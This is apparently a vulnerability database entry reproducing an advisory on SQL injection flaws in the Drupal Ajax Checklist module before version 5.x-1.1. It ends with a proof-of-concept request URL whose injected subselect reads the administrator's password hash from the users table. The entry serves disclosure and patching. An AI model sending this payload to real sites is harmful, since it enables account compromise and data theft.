Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Vulnerabilities

2014-07-01T00:00:00
ID SSV:85701
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/31384/info

The Ajax Checklist module for Drupal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in SQL queries.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

These issues affect versions prior to Ajax Checklist 5.x-1.1. 

http://www.example.com/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20f
rom%20users%20where%20uid=1),3),(4,4,%274/3/4